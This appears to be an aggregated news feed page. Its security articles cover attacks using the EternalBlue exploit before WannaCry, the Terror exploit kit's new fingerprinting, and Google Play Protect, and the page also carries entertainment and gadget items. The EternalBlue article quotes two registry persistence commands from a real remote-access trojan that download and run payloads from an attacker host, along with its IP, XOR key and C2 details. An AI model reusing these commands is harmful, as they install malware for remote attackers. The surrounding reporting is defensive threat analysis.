News & Updates

Is your router collects data on your network?

Netgear last week pushed out a firmware update for its wireless router model NightHawk R7000 with a remote data collection feature that collects router’s analytics data and sends it to the company’s server.

For now, the company has rolled out the firmware update for its NightHawk R7000, but probably other router models would receive the update in


Source: http://feeds.feedburner.com/TheHackersNews

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.

In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show worm network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once infected a system, the malicious code closes the port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February.  We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

  • reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
  • reg add “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f

The malicious code attempts to delete a number of users and terminate and/or delete various files or processes.  The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The facts that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

In late April, The experts at Secdo also discovered another attack exploiting the EthernalBlue vulnerability,  it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before the WannaCry, this means a significant portion of the security community failed to monitor the threat or that failed to share the information about the attacks they have observed.

The success of EternalBlue attacks are the failure of our current model of cyber security.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – WannaCry, EternalBlue vulnerability)

medianet_width = “600”;
medianet_height = “120”;
medianet_crid = “757750211”;
medianet_versionId = “111299”;
(function() {
var isSSL = ‘https:’ == document.location.protocol;
var mnSrc = (isSSL ? ‘https:’ : ‘http:’) + ‘//contextual.media.net/nmedianet.js?cid=8CU5BD6EW’ + (isSSL ? ‘&https=1’ : ”);
document.write(”);
})();

The post At least 3 different groups have been leveraging the NSA EternalBlue exploit, what’s went wrong? appeared first on Security Affairs.

Source: Security affairs

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.

Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites were used to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.

The powerful exploit kit was observed carpet bombing victims using many exploits at the same time, but now experts from Talos group observed a significant change in their tactic. News of the day is that the Terror Exploit Kit was improved with new exploits and implemented fingerprinting abilities. These latter features allow the EK to determine what exploit would be used in order to compromise the target system.

The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page, after a single day of analysis the gate switched to Terror exploit kit.

“Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

Terror Exploit Kit

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – Terror Exploit Kit, hacking)

medianet_width = “600”;
medianet_height = “120”;
medianet_crid = “757750211”;
medianet_versionId = “111299”;
(function() {
var isSSL = ‘https:’ == document.location.protocol;
var mnSrc = (isSSL ? ‘https:’ : ‘http:’) + ‘//contextual.media.net/nmedianet.js?cid=8CU5BD6EW’ + (isSSL ? ‘&https=1’ : ”);
document.write(”);
})();

The post Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities appeared first on Security Affairs.

Source: Security affairs

Survivor: Game Changers Season 34 finale is coming closer. The Internet is buzzing with speculations on who will win this season. Out of the final six, Sarah Lacina seems to be a strong contender as Season 34 winner.  Find out why? Those who have followed Survivor series will remember Lacina has played this game before. […]

The post ‘Survivor: Game Changers’ Season 34 Finale Spoilers: Sarah Lacina Might Win; Here’s Why? appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

The Voice 2017 winner will be announced on May 23. But before the results are out on Tuesday, the previous day, on May 22, fans will witness all the Top 4 contestants performing. Read to know more details about the season 12 finale and what the winner will get. What Will Happen On The Voice […]

The post ‘The Voice’ 2017 Winner Prize, Air Date: Everything To Know About Season 12 Finale appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

While everyone is waiting eagerly for Supercell to announce the next BIG update for Clash of Clans, there is a bad news for some of the iOS users. The developer has announced that it is ending support for older Apple devices running older iOS versions. Supercell was expected to bring a host of new features […]

The post Next Clash of Clans BIG Update Has A Bad News For Apple Users Who Own Devices Running iOS Version Lower Than 7.x appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

The BLUBOO S1 bezel-less concept phone inspired by Xiaomi MI MIX garnered a lot of attention at the recently held Global Source Fair 2017 event in Hong Kong. The smartphone sports a premium appeal, packed with impressive specs and it will be coming with affordable pricing. The first official renders of BLUBOO S1 had appeared […]

The post BLUBOO S1 Bezel-less Design Gets Exposed as Launch Nears appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

Google is rolling out a new protection system called Google Play Protect, it is a machine-learning system to protect Android users.

Good news for Android users, Google has introduced another security defense system, called Google Play Protect, to protect the devices running its mobile OS.

Google already uses several security measures to protect the smartphone, such as Verify Apps and the Bouncer service, anyway, once the apps are uploaded to the Play Store and installed on your device, Google was not able to monitor the behavior of the apps and the detection of the malicious ones.

Google Play Protect

Google Play Protect implements a machine learning and app usage analysis to identify any malicious activity on the mobile device.

The new system is integrated into the Google Play Store app, this means that its usage is transparent to the end user that doesn’t need to install or enable it on his device.

“Google Play Protect continuously works to keep your device, data and apps safe. It actively scans your device and is constantly improving to make sure you have the latest in mobile security. Your device is automatically scanned around the clock, so you can rest easy.” reads the description published by Google.

Google Play Protect for implements the following features:

  • App scanning
  • Anti-Theft Measures
  • Browser Protection

Google Play Protect service will be rolling out to all the Android mobile devices over the coming weeks.

The app scanning is an always-on service on devices, it is able to scan 50 billion apps each day across a billion Android mobile devices to detect malicious applications.

The Google Play Protect also monitor mobile apps that have been installed by users from third-party stores.

The machine learning algorithms implemented by Google in its protection systems compares app behavior and are able to identify any behavious that match malicious patterns.

Of course, the machine learning system regularly updates to identify and mitigate new cyber threats.

When the system detects a malicious app, it warns the user or even disables the app.

“With more than 50 billion apps scanned every day, our machine learning systems are always on the lookout for new risks, identifying potentially harmful apps and keeping them off your device or removing them. All Google Play apps go through a rigorous security analysis even before they’re published on the Play Store—and Play Protect warns you about bad apps that are downloaded from other sources too.” states a blog post published by Google. “Play Protect watches out for any app that might step out of line on your device, keeping you and every other Android user safe.”

The news system implements Anti-Theft Measures, the Android Device Manager has been replaced with Find My Device, that allows users to locate lost and misplaced devices. The new feature is available through user’s browser or any other mobile device. The service also allows to remotely wipe data on the lost device.

Another interesting feature implemented by Google is the Safe Browsing feature in Chrome, the Google Play Protect protects users while browsing.

The feature will block malicious websites that were designed to deliver malicious code on the mobile devices.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – Google Play Protect, Android)

medianet_width = “600”;
medianet_height = “120”;
medianet_crid = “757750211”;
medianet_versionId = “111299”;
(function() {
var isSSL = ‘https:’ == document.location.protocol;
var mnSrc = (isSSL ? ‘https:’ : ‘http:’) + ‘//contextual.media.net/nmedianet.js?cid=8CU5BD6EW’ + (isSSL ? ‘&https=1’ : ”);
document.write(”);
})();

The post Google is rolling out Google Play Protect, a machine-learning system to protect Android users appeared first on Security Affairs.

Source: Security affairs

Chatting up MoonExpress co-founder and chairman Naveen Jain (video link)

NEW ORLEANS—The day before we talked with Moon Express co-founder and chairman Naveen Jain, he sat on the Collision Conference mainstage next to a HoloLens-clad Robert Scoble. The successful investor Jain and the enthusiastic tech-evangelist Scoble chatted about “Startups as a Superpower,” exploring what it means if a private business—and not another nation-state—becomes the fourth entity to reach the Moon. And while the challenge definitely carries an inherent amount of glory, Jain believes a startup will have the next Armstrong moment for one familiar reason.

“[Successful entrepreneurs] have to look at what problems we want to solve—tech is a means to an end, and profit is a motivator,” he said. “If I want to create a $10 billion business, I need to solve a problem that affects at least one billion people.”

Read 10 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/

Andrew Cunningham

We live in uncertain times, but when it comes to laptops, we’re actually pretty spoiled these days. The low-end still has plenty of junky machines, but buying good, thoughtfully designed computers for $700 and up is also easier than ever.

That means that sweating the details is more important than ever. A thin-and-light design, a nice IPS screen, a non-terrible keyboard and trackpad, and a good (and/or forward-looking) port selection can all be expected from a high-end laptop these days. So purchasing decisions and recommendations increasingly come down to the little things.

Read 21 remaining paragraphs | Comments

Source: http://feeds.arstechnica.com/arstechnica/index/